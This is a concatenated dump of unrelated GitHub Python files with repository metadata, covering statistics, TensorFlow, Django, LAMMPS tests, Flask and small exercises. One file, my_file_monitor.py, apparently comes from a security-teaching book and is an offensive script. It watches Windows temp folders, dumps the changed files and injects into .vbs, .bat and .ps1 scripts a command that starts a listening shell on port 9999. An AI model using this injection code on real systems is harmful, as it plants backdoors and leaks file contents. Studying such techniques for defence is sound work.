import scipy.stats
from prettytable import PrettyTable
from benchmark.benchmarks import get_benchmark
if __name__ == "__main__":
benchmark = get_benchmark("ucmo")
results = benchmark.run(writer=WRITER,
loader=LOADER,
run_if_loading_fails=True)
# set the igd values for each of the problems
MultiObjectiveAnalyzer().run(results, benchmark=benchmark, inplace=True)
# now aggregate all the runs to have some representative values
attrs = [("igd", np.array, "igd"),
("igd", np.mean, "avg"),
("igd", np.std, "std")]
igd = GroupBy(attrs).run(results, group_by=["problem", "algorithm"])
for scope, d in filter_by(igd, ["problem"], return_group=True):
# find the best algorithm for this problem
l = sorted(d, key=lambda x: x["avg"])
best = l[0]["igd"]
t = PrettyTable()
t.title = scope["problem"]
t.field_names = ['Algorithm', 'avg', 'std', 'shapiro', 'levene', 't-test', 'wilcoxon']
for i, e in enumerate(l):
f = e["igd"]
_, pval = scipy.stats.shapiro(f)
shapiro = "*" if pval >= 0.01 else ""
_, pval = scipy.stats.levene(best, f)
levene = "* (%.3f)" % pval if pval >= 0.05 else ""
_, pval = scipy.stats.ttest_ind(f, best, alternative="greater")
ttest = "* (%.3f)" % pval if pval >= 0.05 else ""
if len(best) == len(f):
_, pval = scipy.stats.wilcoxon(f, best, zero_method="zsplit", alternative="greater")
wilcoxon = "* (%.3f)" % pval if pval >= 0.05 else ""
else:
wilcoxon = "x"
t.add_row([e["algorithm"], "%.10f" % e["avg"], "%.10f" % e["std"], shapiro, levene, ttest, wilcoxon])
print(t)
print()
|
[
"jules89@arcor.de"
] |
jules89@arcor.de
|
68b2d9074b11197d63b539d98ae83fa80cfe4639
|
27ece9ab880a0bdba4b2c053eccda94602c716d5
|
/.history/tf_regression_logistic_20181129223556.py
|
0f19edb1cef55ba195e28ea07b0aef3180fcad9a
|
[] |
no_license
|
Symfomany/keras
|
85e3ad0530837c00f63e14cee044b6a7d85c37b2
|
6cdb6e93dee86014346515a2017652c615bf9804
|
refs/heads/master
| 2020-04-08T20:21:35.991753
| 2018-11-30T08:23:36
| 2018-11-30T08:23:36
| 159,695,807
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,338
|
py
|
import matplotlib.pyplot as plt
import tensorflow as tf
import numpy as np
import os, argparse
"""
Any interaction with your filesystem to save persistent data in TF needs a Saver object and a Session object.
The Saver constructor allows you to control many things among which 1 is important:
The var_list: Default to None, this is the list of variables you want to persist to your filesystem.
You can either choose to save all the variables, some variables or even a dictionary to give custom names to your variables.
The Session constructor allows you to control 3 things:
+ The var_list: This is used in case of a distributed architecture to handle computation. You can specify which TF server or ‘target’ you want to compute on.
+ The graph: the graph you want the Session to handle. The tricky thing for beginners is the fact that there is always a default Graph in TF where all operations are set by default, so you are always in a “default Graph scope”.
+ The config: You can use ConfigProto to configure TF. Check the linked source for more details.
The Saver can handle the saving and loading (called restoring) of your Graph metadata and your Variables data.
To do that, it adds operations inside the current Graph that will be evaluated within a session.
By default, the Saver will handle the default Graph and all its included Variables,
but you can create as much Savers as you want to control any graph or subgraph and their variables.
"""
dir = os.path.dirname(os.path.realpath(__file__))
def freeze_graph(model_dir, output_node_names):
"""Extract the sub graph defined by the output nodes and convert
all its variables into constant
Args:
model_dir: the root folder containing the checkpoint state file
output_node_names: a string, containing all the output node's names,
comma separated
"""
if not tf.gfile.Exists(model_dir):
raise AssertionError(
"Export directory doesn't exists. Please specify an export "
"directory: %s" % model_dir)
if not output_node_names:
print("You need to supply the name of a node to --output_node_names.")
return -1
# We retrieve our checkpoint fullpath
checkpoint = tf.train.get_checkpoint_state(model_dir)
input_checkpoint = checkpoint.model_checkpoint_path
# We precise the file fullname of our freezed graph
absolute_model_dir = "/".join(input_checkpoint.split('/')[:-1])
output_graph = absolute_model_dir + "/frozen_model.pb"
# We clear devices to allow TensorFlow to control on which device it will load operations
clear_devices = True
# We start a session using a temporary fresh Graph
with tf.Session(graph=tf.Graph()) as sess:
# We import the meta graph in the current default Graph
saver = tf.train.import_meta_graph(input_checkpoint + '.meta', clear_devices=clear_devices)
# We restore the weights
saver.restore(sess, input_checkpoint)
# We use a built-in TF helper to export variables to constants
output_graph_def = tf.graph_util.convert_variables_to_constants(
sess, # The session is used to retrieve the weights
tf.get_default_graph().as_graph_def(), # The graph_def is used to retrieve the nodes
output_node_names.split(",") # The output node names are used to select the usefull nodes
)
# Finally we serialize and dump the output graph to the filesystem
with tf.gfile.GFile(output_graph, "wb") as f:
f.write(output_graph_def.SerializeToString())
print("%d ops in the final graph." % len(output_graph_def.node))
return output_graph_def
def get_dataset():
"""
Method used to generate the dataset
"""
# Numbers of row per class
row_per_class = 100
# Generate rows
sick = np.random.randn(row_per_class, 2) + np.array([-2, -2])
sick_2 = np.random.randn(row_per_class, 2) + np.array([2, 2])
healthy = np.random.randn(row_per_class, 2) + np.array([-2, 2])
healthy_2 = np.random.randn(row_per_class, 2) + np.array([2, -2])
features = np.vstack([sick, sick_2, healthy, healthy_2])
targets = np.concatenate((np.zeros(row_per_class * 2), np.zeros(row_per_class * 2) + 1))
targets = targets.reshape(-1, 1)
return features, targets
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--model_dir", type=str, default="models", help="Model folder to export")
parser.add_argument("--output_node_names", type=str, default="tf_models", help="The name of the output nodes, comma separated.")
args = parser.parse_args()
features, targets = get_dataset()
# Plot points
#plt.scatter(features[:, 0], features[:, 1], s=40, c=targets, cmap=plt.cm.Spectral)
#plt.show()
tf_features = tf.placeholder(tf.float32, shape=[None, 2])
tf_targets = tf.placeholder(tf.float32, shape=[None, 1])
# First
w1 = tf.Variable(tf.random_normal([2, 3]))
b1 = tf.Variable(tf.zeros([3]))
# Operations
z1 = tf.matmul(tf_features, w1) + b1
a1 = tf.nn.sigmoid(z1)
# Output neuron
w2 = tf.Variable(tf.random_normal([3, 1]))
b2 = tf.Variable(tf.zeros([1]))
# Operations
z2 = tf.matmul(a1, w2) + b2
py = tf.nn.sigmoid(z2)
cost = tf.reduce_mean(tf.square(py - tf_targets))
correct_prediction = tf.equal(tf.round(py), tf_targets)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.1)
train = optimizer.minimize(cost)
sess = tf.Session()
sess.run(tf.global_variables_initializer())
for e in range(100):
sess.run(train, feed_dict={
tf_features: features,
tf_targets: targets
})
print("accuracy =", sess.run(accuracy, feed_dict={
tf_features: features,
tf_targets: targets
}))
# We can check easily that we are indeed in the default graph
print(z1.graph == tf.get_default_graph())
# By default, the Saver handles every Variables related to the default graph
all_saver = tf.train.Saver()
all_saver.save(sess, args.model_dir + '/data')
# freeze_graph(args.model_dir, args.output_node_names)
|
[
"julien@meetserious.com"
] |
julien@meetserious.com
|
4fc460384c0da2849c8cd81e53c14410411469db
|
1bf1a8d115d9720dacb84b5c8fefb49af015c295
|
/backend/soft_sound_26327/wsgi.py
|
d82dfa567ac94e3653dfc6d99f1fb57752c26fe4
|
[] |
no_license
|
crowdbotics-apps/soft-sound-26327
|
dba9358659d899d485a0b10cd63e41c68e865e22
|
5d35e9d5bd2cdad5ab5e5f2a95d8190ce367ff43
|
refs/heads/master
| 2023-04-11T15:35:04.366308
| 2021-05-07T12:50:17
| 2021-05-07T12:50:17
| 365,231,981
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for soft_sound_26327 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'soft_sound_26327.settings')
application = get_wsgi_application()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
9379f75d7a6e72f76b8b8000d917229c05095694
|
ceead28beb1ea6cb56a2bb4472bc1d2396b39e6f
|
/gen_basis_helpers/lammps_interface/unit_tests/utests_calc_objs.py
|
e7ea97f5225ee65c88ea89d7726bdc7ec75871d3
|
[] |
no_license
|
RFogarty1/plato_gen_basis_helpers
|
9df975d4198bff7bef80316527a8086b6819d8ab
|
8469a51c1580b923ca35a56811e92c065b424d68
|
refs/heads/master
| 2022-06-02T11:01:37.759276
| 2022-05-11T12:57:40
| 2022-05-11T12:57:40
| 192,934,403
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,352
|
py
|
import copy
import collections
import os
import unittest
import unittest.mock as mock
import gen_basis_helpers.lammps_interface.lammps_calc_objs as tCode
class TestCalcObjStandard(unittest.TestCase):
def setUp(self):
self.baseFolder = "fake_path"
self.baseFileName = "test_file"
self.dataFileOrderedDict = collections.OrderedDict([["fake_header","fake_val"]])
self.scriptFileOrderedDict = collections.OrderedDict([["read_data","datafile"],["commA","valA"]])
self.createTestObjs()
def createTestObjs(self):
argList = [self.baseFolder, self.baseFileName, self.dataFileOrderedDict, self.scriptFileOrderedDict]
self.testObjA = tCode.LammpsCalcObjStandard(*argList)
def testScriptFilePathAsExpected(self):
expPath = os.path.join(self.baseFolder, self.baseFileName) + ".in"
actPath = self.testObjA.scriptFilePath
self.assertEqual(expPath,actPath)
def testDataFilePathAsExpected(self):
expPath = os.path.join(self.baseFolder, self.baseFileName) + ".data"
actPath = self.testObjA.dataFilePath
self.assertEqual(expPath,actPath)
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.fileIoHelp")
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.pathlib")
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.LammpsCalcObjStandard.dataFilePath", new_callable=mock.PropertyMock)
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.LammpsCalcObjStandard.scriptFilePath", new_callable=mock.PropertyMock)
def testWriteFileCallsExpected(self, mockScriptPathProp, mockDataPathProp, mockedPathLib, mockedFileIo):
expScriptPath, expDataPath = "script_path", "data_path"
mockScriptPathProp.return_value = expScriptPath
mockDataPathProp.return_value = expDataPath
expScriptDict = copy.deepcopy(self.scriptFileOrderedDict)
expScriptDict["read_data"] = expDataPath #Really only needs the fileName rather than path
self.testObjA.writeFile()
mockedPathLib.Path.assert_called_with(self.baseFolder)
mockedFileIo.writeScriptFileFromTokens.assert_called_with(expScriptPath, self.scriptFileOrderedDict)
mockedFileIo.writeDataFileFromTokens.assert_called_with(expDataPath, self.dataFileOrderedDict)
@mock.patch("gen_basis_helpers.lammps_interface.lammps_calc_objs.LammpsCalcObjStandard.scriptFilePath", new_callable=mock.PropertyMock)
def testExpectedRunComm(self, mockedScriptPath):
expScriptPath = "some_dir/test_script_path"
mockedScriptPath.return_value = expScriptPath
expRunComm = "lmp -in test_script_path"
actRunComm = self.testObjA.runComm
self.assertEqual(expRunComm,actRunComm)
class TestScriptFileOptsStandard(unittest.TestCase):
def setUp(self):
self.initOpts = collections.OrderedDict([["initOptKey","initOptVal"]])
self.setupBox = collections.OrderedDict([["setupBoxKey","setupBoxVal"]])
self.setupAtoms = collections.OrderedDict([["setupAtomsKey","setupAtomsVal"]])
self.forceFieldOpts = collections.OrderedDict([["forceFieldKey","forceFieldVal"]])
self.settingsOpts = collections.OrderedDict([["settingsKey","settingsVal"]])
self.fixOpts = collections.OrderedDict([["fixKey","fixVals"]])
self.outputSection = collections.OrderedDict([["outputKey","outputVal"]])
self.createTestObjs()
def createTestObjs(self):
kwargDict = {"initOpts": self.initOpts, "setupBox": self.setupBox,
"setupAtoms": self.setupAtoms, "forceFieldOpts": self.forceFieldOpts,
"settingsOpts": self.settingsOpts, "fixSection": self.fixOpts,
"outputSection": self.outputSection}
self.testObjA = tCode.ScriptFileOptionsStandard(**kwargDict)
def testExpectedDict_allOptsSet(self):
expDict = self._loadExpectedDictA()
actDict = self.testObjA.getOutputDict()
self.assertEqual(expDict,actDict)
def testExpectedDict_fixOptsNotSet(self):
self.fixOpts = None
self.createTestObjs()
expDict = self._loadExpectedDictA()
expDict.pop("fixKey")
actDict = self.testObjA.getOutputDict()
self.assertEqual(expDict, actDict)
def _loadExpectedDictA(self):
expDict = collections.OrderedDict()
expDict["initOptKey"] = "initOptVal"
expDict["setupBoxKey"] = "setupBoxVal"
expDict["setupAtomsKey"] = "setupAtomsVal"
expDict["forceFieldKey"] = "forceFieldVal"
expDict["settingsKey"] = "settingsVal"
expDict["fixKey"] = "fixVals"
expDict["outputKey"] = "outputVal"
return expDict
|
[
"richard.m.fogarty@gmail.com"
] |
richard.m.fogarty@gmail.com
|
b79d0c78af023ef7ed30861159fed93a15561056
|
8acffb8c4ddca5bfef910e58d3faa0e4de83fce8
|
/ml-flask/Lib/site-packages/networkx/utils/random_sequence.py
|
8b85ab0377cfc422b3d928447eefc64534d09e7d
|
[
"MIT"
] |
permissive
|
YaminiHP/SimilitudeApp
|
8cbde52caec3c19d5fa73508fc005f38f79b8418
|
005c59894d8788c97be16ec420c0a43aaec99b80
|
refs/heads/master
| 2023-06-27T00:03:00.404080
| 2021-07-25T17:51:27
| 2021-07-25T17:51:27
| 389,390,951
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
version https://git-lfs.github.com/spec/v1
oid sha256:c5e599427c932f0d245045fe663be170579a4a231663b09977410234d4901ef6
size 4085
|
[
"yamprakash130@gmail.com"
] |
yamprakash130@gmail.com
|
820179af2252cd5b64438e6edfc4fb743ccbba98
|
9c5cbe763edf9b2857fc4d3a01b0ffd84f84732c
|
/courses/urls.py
|
736f7edd62c9a9ee82e1c68ae04a7a86a4289af0
|
[] |
no_license
|
miclemabasie/Django-Elearn
|
943dda71f19cebe73afc8b22858b016065848987
|
b69ccd40719bef63ce4ff8d16262552db78dfdce
|
refs/heads/main
| 2023-07-30T04:50:40.484172
| 2021-09-22T17:56:08
| 2021-09-22T17:56:08
| 408,752,595
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('mine/',
views.ManageCourseListView.as_view(),
name='manage_course_list'
),
path('create/',
views.CourseCreateView.as_view(),
name='course_create'
),
path('<pk>/edit/',
views.CourseUpdateView.as_view(),
name='course_edit'
),
path('<pk>/delete/',
views.CourseDeleteView.as_view(),
name='course_delete'
),
path('<pk>/module/',
views.CourseModuleUpdate.as_view(),
name='course_module_update'
),
path('module/<int:module_id>/content/<model_name>/create/',
views.ContentCreateUpdateView.as_view(),
name='module_content_create'
),
path('module/<int:module_id>/content/<model_name>/<id>/',
views.ContentCreateUpdateView.as_view(),
name='module_content_update'
),
path('content/<int:id>/delete/',
views.ContentDeleteView.as_view(),
name='module_content_delete'
),
path('module/<int:module_id>/',
views.ModuleContentListView.as_view(),
name='module_content_list'
),
]
|
[
"miclemabasie3@gmail.com"
] |
miclemabasie3@gmail.com
|
ee9757768aa20d43a6d7e774315d16995cd75ed6
|
2f76da1ab7d6b8ea0184c5ad2c522518ab37823f
|
/speech_parts.py
|
8dbd9e71f75a67ca948bd7b45c8c6483afb8d9a2
|
[] |
no_license
|
abezgauzdina/knesset-data-committees
|
4ebdddd0d5ec868b1f2037c66be2dd752431ca10
|
d80346aae116365d9959fb48ad1f58666d04f020
|
refs/heads/master
| 2021-09-15T07:39:53.205577
| 2017-11-29T09:54:03
| 2017-11-29T09:54:03
| 115,918,597
| 0
| 0
| null | 2018-04-23T19:45:32
| 2018-01-01T12:43:43
|
CSS
|
UTF-8
|
Python
| false
| false
| 1,906
|
py
|
from tabulator import Stream
import os, requests, logging, re, json
def get_speech_part_body(speech_part):
return speech_part["body"].replace("\n", "<br/>")
def get_speech_parts_stream(**kwargs):
stream = Stream(**kwargs)
stream.open()
if stream.headers == ['header', 'body']:
return stream
else:
return None
def get_speech_parts_source(meeting, parts_url):
if os.environ.get("ENABLE_LOCAL_CACHING") == "1":
parts_file = "data/minio-cache/committees/{}".format(meeting["parts_object_name"])
if not os.path.exists(parts_file):
os.makedirs(os.path.dirname(parts_file), exist_ok=True)
with open(parts_file, "wb") as f:
f.write(requests.get(parts_url).content)
return "file", parts_file
else:
return "url", parts_url
def get_speech_part_contexts(stream):
for order, row in enumerate(stream):
if not row:
header, body = "", ""
elif len(row) == 2:
header, body = row
else:
header, body = "", str(row)
yield {"order": order,
"header": header,
"body": body}
def get_speech_parts(meeting):
source_type, source = None, None
if meeting["parts_object_name"]:
parts_url = "https://minio.oknesset.org/committees/{}".format(meeting["parts_object_name"])
try:
source_type, source = get_speech_parts_source(meeting, parts_url)
stream = get_speech_parts_stream(source=source, headers=1)
if stream:
yield from get_speech_part_contexts(stream)
stream.close()
except Exception:
logging.exception("Failed to get speech parts for {}".format(meeting["parts_object_name"]))
if source_type == "file" and os.path.exists(source):
os.unlink(source)
raise
|
[
"ori@uumpa.com"
] |
ori@uumpa.com
|
0f2b5f1b67de643723f3d4cb34ec4d21663d34ba
|
3775102a3f59bc8aac9b8121ba2aef87409724ee
|
/Easy/slang_flavor.py
|
33034c354656685515600b8a5be64b39de275dec
|
[] |
no_license
|
csikosdiana/CodeEval
|
a446ec6673e9f97439662bfccbd7454e5740d509
|
15cdd9ca454939e93c77d5ed5076595ecc7e4301
|
refs/heads/master
| 2016-08-11T14:49:27.565799
| 2016-03-22T17:48:20
| 2016-03-22T17:48:20
| 46,176,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 852
|
py
|
data = ["Lorem ipsum dolor sit amet. Mea et habeo doming praesent. Te inani utroque recteque has, sea ne fugit verterem!",
"Usu ei scripta phaedrum, an sed salutatus definiebas? Qui ut recteque gloriatur reformidans. Qui solum aeque sapientem cu.",
"Eu nam nusquam quaestio principes."]
slang = [", yeah!", ", this is crazy, I tell ya.", ", can U believe this?", ", eh?",
", aw yea.", ", yo.", "? No way!", ". Awesome!"]
#import sys
#test_cases = open(sys.argv[1], 'r')
#data = test_cases.readlines()
position = 0
s = 0
for test in data:
test = test.rstrip()
text = ""
for i in test:
if s == len(slang):
s = 0
if ((i == ".") or (i == "!") or (i == "?")):
position += 1
if position % 2 == 0:
t = slang[s]
s += 1
text = text + t
else:
text = text + i
else:
text = text + i
print text
#test_cases.close()
|
[
"csikosdiana@gmail.com"
] |
csikosdiana@gmail.com
|
7f6bcb9e8da7fe2b36ab5738310c1dc96aa599b5
|
5774101105b47d78adb7a57eefdfa21502bbd70c
|
/python框架/flask/Flask-RESTful/s3_error404定制.py
|
73259f73985c047a86f46f7e8b642e2a561425ae
|
[] |
no_license
|
zhlthunder/python-study
|
34d928f0ebbdcd5543ae0f41baaea955c92f5c56
|
0f25dd5105ba46791842d66babbe4c3a64819ee5
|
refs/heads/master
| 2023-01-12T18:39:47.184978
| 2018-10-07T23:48:04
| 2018-10-07T23:48:04
| 90,516,611
| 0
| 1
| null | 2022-12-26T19:46:22
| 2017-05-07T07:39:48
|
HTML
|
UTF-8
|
Python
| false
| false
| 1,234
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#author:zhl
#refer:https://blog.csdn.net/dream_flying_bj/article/details/61198475
#安装pip3 install flask-restful
##使用参考: pip3 install flask-restful
from flask import Flask, jsonify
from flask import abort
from flask import make_response
app = Flask(__name__)
tasks = [
{
'id': 1,
'title': u'Buy groceries',
'description': u'Milk, Cheese, Pizza, Fruit, Tylenol',
'done': False
},
{
'id': 2,
'title': u'Learn Python',
'description': u'Need to find a good Python tutorial on the web',
'done': False
}
]
@app.errorhandler(404) ##别的不存在的url都可以成功跳转到这里,唯一的问题就是if not len(list(task)) 如果跳转,方法待确认
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/todo/api/v1.0/tasks/<int:task_id>', methods=['GET'])
def get_task(task_id):
task = filter(lambda t: t['id'] == task_id, tasks)
if not len(list(task)):
return "404"
task = filter(lambda t: t['id'] == task_id, tasks)
return jsonify({'task': task.__next__()})
if __name__ == '__main__':
app.run(debug=True)
|
[
"zhlthunder@163.com"
] |
zhlthunder@163.com
|
34ae6b4403ac4a915276300f832032a92bc1afc5
|
39978dba83181975b29b884d1e9cc22ed32bb097
|
/prepare_data.py
|
f7b2f6f0058a5a59c0c89ca56f3718faa720435d
|
[
"MIT"
] |
permissive
|
Blarc/lol-dodge-predictor
|
c3e5050c577eb003d960941f8f601545de8a6abd
|
01ac9ce1f117dba7f2375958f96fd1336cc0049d
|
refs/heads/main
| 2023-02-08T11:01:01.435267
| 2021-01-04T14:21:38
| 2021-01-04T14:21:38
| 311,631,559
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,158
|
py
|
import copy
import json
import cassiopeia as cass
import pandas as pd
from IPython.display import clear_output
from roleidentification import get_roles, pull_data
NUMBER_OF_LINES = 108941
champion_roles = pull_data()
champions_mapper = {champion.id: champion.name for champion in cass.get_champions("EUW")}
summoners = {}
matches = {}
summoners_columns_mapper = {
'total_games': 0,
'wins': 1
}
role_index_mapper = {
'TOP': 0,
'JUNGLE': 1,
'MIDDLE': 2,
'BOTTOM': 3,
'UTILITY': 4
}
columns_by_role = ['kills', 'deaths', 'assists', 'gold_earned', 'total_damage_dealt_to_champions',
'total_minions_killed', 'vision_score', 'vision_wards_bought', 'total_games', 'wins']
index = len(summoners_columns_mapper)
for role_name in role_index_mapper.keys():
for column in columns_by_role:
column_key = role_name + '_' + column
summoners_columns_mapper[column_key] = index
index += 1
columns_mapper = {}
index = 0
matches_index = 0
with open('data/raw_data/match_all_merged_sorted.csv', encoding='utf8') as infile:
for line in infile:
split = line.rstrip('\n').split(';')
if index == 0:
columns_mapper = {key: value for value, key in enumerate(split)}
index += 1
continue
queue_id = float(split[columns_mapper['queueId']])
if queue_id != 420:
index += 1
continue
game_duration = float(split[columns_mapper['gameDuration']])
participant_identities = json.loads(split[columns_mapper['participantIdentities']] \
.replace('\'', '\"'))
participants = json.loads(split[columns_mapper['participants']] \
.replace('\'', '\"') \
.replace('False', '0') \
.replace('True', '1'))
champions = []
for participant in participants:
champions.append(participant['championId'])
roles = list(get_roles(champion_roles, champions[0:5]).items())
roles += list(get_roles(champion_roles, champions[5:10]).items())
teams = {
100: [None] * 5,
200: [None] * 5
}
win_dict = {}
for participantIdentity, participant, role in zip(participant_identities, participants, roles):
summoner_id = participantIdentity['player']['summonerId']
team_id = participant['teamId']
role_name = role[0]
role_index = role_index_mapper[role[0]]
participant_stats = participant['stats']
win = participant_stats['win']
kills = participant_stats['kills']
deaths = participant_stats['deaths']
assists = participant_stats['assists']
gold_earned = participant_stats['goldEarned']
total_damage_dealt_to_champions = participant_stats['totalDamageDealtToChampions']
total_minions_killed = participant_stats['totalMinionsKilled']
vision_score = participant_stats['visionScore']
vision_wards_bought = participant_stats['visionWardsBoughtInGame']
if summoner_id not in summoners:
summoners[summoner_id] = {key: 0 for key in summoners_columns_mapper}
summoners[summoner_id]['wins'] += win
summoners[summoner_id]['total_games'] += 1
summoners[summoner_id][role_name + '_wins'] += win
summoners[summoner_id][role_name + '_total_games'] += 1
summoners[summoner_id][role_name + '_kills'] += kills / game_duration * 60
summoners[summoner_id][role_name + '_deaths'] += deaths / game_duration * 60
summoners[summoner_id][role_name + '_assists'] += assists / game_duration * 60
summoners[summoner_id][role_name + '_gold_earned'] += gold_earned / game_duration * 60
summoners[summoner_id][
role_name + '_total_damage_dealt_to_champions'] += total_damage_dealt_to_champions / game_duration * 60
summoners[summoner_id][role_name + '_total_minions_killed'] += total_minions_killed / game_duration * 60
summoners[summoner_id][role_name + '_vision_score'] += vision_score / game_duration * 60
summoners[summoner_id][role_name + '_vision_wards_bought'] += vision_wards_bought / game_duration * 60
summoner = copy.deepcopy(summoners[summoner_id])
for role_label in role_index_mapper.keys():
total_games = summoner[role_label + '_total_games']
if total_games == 0:
total_games += 1
summoner[role_label + '_wins'] /= total_games
summoner[role_label + '_kills'] /= total_games
summoner[role_label + '_deaths'] /= total_games
summoner[role_label + '_assists'] /= total_games
summoner[role_label + '_gold_earned'] /= total_games
summoner[role_label + '_total_damage_dealt_to_champions'] /= total_games
summoner[role_label + '_total_minions_killed'] /= total_games
summoner[role_label + '_vision_score'] /= total_games
summoner[role_label + '_vision_wards_bought'] /= total_games
teams[team_id][role_index] = summoner
win_dict[team_id] = participant['stats']['win']
for team, win in zip(teams.values(), win_dict.values()):
match = {}
for role, player in zip(role_index_mapper.keys(), team):
for key, value in player.items():
match[role + '_' + key] = value
match['win'] = win
matches[matches_index] = match
matches_index += 1
clear_output(wait=True)
print(f'{index} / {NUMBER_OF_LINES}')
index += 1
# 156344
print(f'Number of matches: {len(matches)}')
print('Saving to csv...')
pd.DataFrame.from_dict(data=matches, orient='index').to_csv('data/processed_data/matches_sorted.csv', header=True)
print('Saved to \'data/processed_data/matches_sorted.csv\'')
|
[
"jakob.malezic@gmail.com"
] |
jakob.malezic@gmail.com
|
5eaa86000cf6a4bf50b9794b70c14cebc088bf10
|
77311ad9622a7d8b88707d7cee3f44de7c8860cb
|
/res/scripts/client/gui/scaleform/daapi/view/meta/channelwindowmeta.py
|
e1885ab5d56862c3eeb542f57abc2cdbefe16faf
|
[] |
no_license
|
webiumsk/WOT-0.9.14-CT
|
9b193191505a4560df4e872e022eebf59308057e
|
cfe0b03e511d02c36ce185f308eb48f13ecc05ca
|
refs/heads/master
| 2021-01-10T02:14:10.830715
| 2016-02-14T11:59:59
| 2016-02-14T11:59:59
| 51,606,676
| 0
| 0
| null | null | null | null |
WINDOWS-1250
|
Python
| false
| false
| 531
|
py
|
# 2016.02.14 12:40:13 Střední Evropa (běžný čas)
# Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/ChannelWindowMeta.py
from gui.Scaleform.framework.entities.abstract.AbstractWindowView import AbstractWindowView
class ChannelWindowMeta(AbstractWindowView):
pass
# okay decompyling c:\Users\PC\wotsources\files\originals\res\scripts\client\gui\scaleform\daapi\view\meta\channelwindowmeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2016.02.14 12:40:13 Střední Evropa (běžný čas)
|
[
"info@webium.sk"
] |
info@webium.sk
|
e43c2f5632fe67304382d4e6a716df7a051baa2b
|
8fd2e5d53d7a91d35288ccefdb0c7ef00d927a0a
|
/book_06_Python黑帽子/Chapter10/my_file_monitor.py
|
82f21f92c9aff7909f4483eadae1363b1c57daa3
|
[] |
no_license
|
atlasmao/Python-book-code
|
03501f9ca2e81bc1f47464b3227c7f9cda0d387c
|
03b6848a15a7e4c2ffebdc3528c24a8b101d9f41
|
refs/heads/master
| 2022-01-06T23:45:21.951307
| 2019-07-11T10:32:22
| 2019-07-11T10:32:22
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,780
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# 监控临时文件的创建, 读写, 删除
import tempfile
import threading
import win32file
import win32con
import os
# 这些是典型的临时文件所在的路径
dirs_to_monitor = ["C:\\WINDOWS\\Temp", tempfile.gettempdir()]
# 文件修改行文对应的常量
FILE_CREATED = 1
FILE_DELETED = 2
FILE_MODIFIED = 3
FILE_RENAMED_FROM = 4
FILE_RENAMED_TO = 5
file_types = {}
command = "C:\\WINDOWS\\TEMP\\bhpnet.exe -l -p 9999 -c"
file_types['.vbs'] = ["\r\n'bhpmarker\r\n", "\r\nCreateObject(\"Wscript.Shell\").Run(\"%s\")\r\n" % command]
file_types['.bat'] = ["\r\nREM bhpmarker\r\n", "\r\n%s\r\n" % command]
file_types['.ps1'] = ["\r\n#bhpmarker", "Start-Process \"%s\"" % command]
# 用于执行代码插入的数据
def inject_code(full_filename, extension, contents):
# 判断文件是否存在标记
if file_types[extension][0] in contents:
return
# 如果没有标记的话, 那么插入代码并标记
full_contents = file_types[extension][0]
full_contents += file_types[extension][1]
full_contents += contents
fd = open(full_filename, 'wb')
fd.write(full_contents)
fd.close()
print "[\o/] Injected code."
return
def start_monitor(path_to_watch):
# 为每个监控器起一个线程
FILE_LIST_DIRECTORY = 0x0001
h_directory = win32file.CreateFile(
path_to_watch,
FILE_LIST_DIRECTORY,
win32con.FILE_SHARE_READ | win32con.FILE_SHARE_WRITE | win32con.FILE_SHARE_DELETE,
None,
win32con.OPEN_EXISTING,
win32con.FILE_FLAG_BACKUP_SEMANTICS,
None
)
while 1:
try:
results = win32file.ReadDirectoryChangesW(
h_directory,
1024,
True,
win32con.FILE_NOTIFY_CHANGE_FILE_NAME |
win32con.FILE_NOTIFY_CHANGE_DIR_NAME |
win32con.FILE_NOTIFY_CHANGE_ATTRIBUTES |
win32con.FILE_NOTIFY_CHANGE_SIZE |
win32con.FILE_NOTIFY_CHANGE_LAST_WRITE |
win32con.FILE_NOTIFY_CHANGE_SECURITY,
None,
None
)
for action, file_name in results:
full_filename = os.path.join(path_to_watch, file_name)
if action == FILE_CREATED:
print "[ + ] Created %s" % full_filename
elif action == FILE_DELETED:
print "[ - ] Deleted %s" % full_filename
elif action == FILE_MODIFIED:
print "[ * ] Modified %s" % full_filename
# 输出文件内容
print "[vvv] Dumping contents..."
try:
fd = open(full_filename, "rb")
contents = fd.read()
fd.close()
print contents
print "[^^^] Dump complete."
except:
print "[!!!] Failed."
file_name, extension = os.path.splitext(full_filename)
if extension in file_types:
inject_code(full_filename, extension, contents)
elif action == FILE_RENAMED_FROM:
print "[ > ] Renamed from: %s" % full_filename
elif action == FILE_RENAMED_TO:
print "[ < ] Renamed to: %s" % full_filename
else:
print "[???] Unknown: %s" % full_filename
except:
pass
for path in dirs_to_monitor:
monitor_thread = threading.Thread(target=start_monitor, args=(path,))
print "Spawning monitoring thread for path: %s" % path
monitor_thread.start()
|
[
"justsweetpotato@gmail.com"
] |
justsweetpotato@gmail.com
|
9507e5df03c571625db06330a495aa6e7a1e0ef0
|
0062ceae0071aaa3e4e8ecd9025e8cc9443bcb3b
|
/solved/6763.py
